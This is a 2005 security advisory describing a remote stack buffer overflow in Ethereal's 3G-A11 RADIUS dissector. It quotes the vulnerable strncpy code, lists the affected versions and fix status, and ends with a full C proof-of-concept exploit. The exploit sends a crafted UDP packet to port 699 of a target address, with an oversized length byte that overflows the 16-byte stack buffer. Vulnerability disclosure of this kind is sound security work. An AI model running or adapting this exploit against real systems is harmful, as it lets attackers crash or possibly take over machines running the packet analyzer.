Ethereal remote buffer overflow
LSS Security Advisory #LSS-2005-03-04
http://security.lss.hr
---
Title : Ethereal remote buffer overflow
Advisory ID : LSS-2005-03-04
Date : 08.03.2005
Advisory URL: : http://security.lss.hr/en/index.php?page=exp
Impact : Stack overflow and possible code execution
Risk level : High
Vulnerability type : Remote
Vendors contacted : Yes
---
===[ Overview
Ethereal is used by network professionals around the world for troubleshooting,
analysis, software and protocol development, and education. It has all of the
standard features you would expect in a protocol analyzer, and several
features not seen in any other product. Its open source license allows talented
experts in the networking community to add enhancements. It runs on all popular
computing platforms, including Unix, Linux, and Windows.
===[ Vulnerability
There is remote buffer overflow vulnerability in Ethereal dissector for
CDMA2000 A11 packets. Vulnerability is located in dissect_a11_radius() function
in packet-3g-a11.c used for RADIUS authentication dissection. Number of bytes
that will be copied from packet to buffer in stack is taken from packet itself.
16 bytes are reserved for that buffer, and string length can be up to 256 bytes
(unsigned char), so is possible to overflow local variables and return address.
packet-3g-a11.c:
----------------
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
size_t radius_len;
...
guchar str_val[MAX_STRVAL];
...
radius_len = tvb_get_guint8(tvb, offset + 1);
...
strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2);
...
}
----------------
A similar vulnerability was also found in same function few lines below where
RADIUS attributes are copied to stack.
packet-3g-a11.c:
----------------
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
guint attribute_len;
...
guchar str_val[MAX_STRVAL];
...
attribute_len = tvb_get_guint8(tvb, offset + radius_offset + 1);
...
case ATTR_TYPE_STR:
strncpy(str_val,tvb_get_ptr(tvb,offset+radius_offset+2,attribute_len - 2),
attribute_len - 2);
...
}
----------------
===[ Affected versions
All versions after 3G-A11 dissector was added to CVS including latest 0.10.9.
Vulnerability was tested with latest Ethereal on Linux and Windows.
===[ Fix
It seems that that they have fixed that vulnerability just few days ago,
and new version will probably be available soon from http://www.ethereal.com.
===[ PoC Exploit
Exploit is in attachment, and URL http://security.lss.hr/en/PoC/
===[ Credits
Credits for this vulnerability goes to Leon Juranic.
===[ LSS Security Contact
LSS Security Team, <eXposed by LSS>
WWW : http://security.lss.hr
E-mail : security@xxxxxx
Tel : +385 1 6129 775
/*
*
* Ethereal 3G-A11 remote buffer overflow PoC exploit
* --------------------------------------------------
* Coded by Leon Juranic <ljuranic@xxxxxx>
* LSS Security <http://security.lss.hr/en/>
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
main (int argc, char **argv)
{
int sock;
struct sockaddr_in sin;
unsigned char buf[1024];
char bla[200];
sock=socket(AF_INET,SOCK_DGRAM,0);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(699);
buf[0] = 22;
memset(buf+1,'A',19);
buf[20] = 38;
*(unsigned short*)&buf[22] = htons(100);
*(unsigned short*)&buf[28] = 0x0101;
buf[30] = 31;
buf[31] = 150; // len for overflow...play with this value if it
doesn't work
memset (bla,'B',200);
strncpy (buf+32,bla,180);
sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
}